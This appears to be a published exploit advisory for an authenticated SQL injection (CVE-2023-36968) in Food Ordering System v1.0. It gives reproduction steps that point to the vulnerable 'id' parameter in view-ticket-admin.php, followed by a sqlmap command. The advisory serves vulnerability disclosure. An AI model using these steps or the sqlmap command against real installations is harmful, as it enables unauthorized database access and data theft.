Food Ordering System v1.0 – Authenticated SQL Injection

#Exploit Title: Food Ordering System v1.0 – Authenticated SQL Injection

#Date: 19 June 2023

#Exploit Author: Okan Kurtulus

#Vendor Homepage: https://github.com/haxxorsid/food-ordering-system

#Version: 1.0

#Tested on: Windows 11

#CVE: 2023-36968

#Affected Parameter: id

#Proof of Concept:

1-) Install Food Ordering System v1.0

2-) Login to the application with the admin user. Click the “All Tickets” menu under “Tickets” from the left menu. Click on any ticket listed.

3-) The ID parameter in the URL “HTTP://localhost/food/view-ticket-admin.php?id=1” is affected by SQL Injection vulnerability.

#SQLMap Command:

sqlmap -u “http://localhost/food/view-ticket-admin.php?id=1″ –cookie=”cookie_value”

Leave a Reply

Your email address will not be published. Required fields are marked *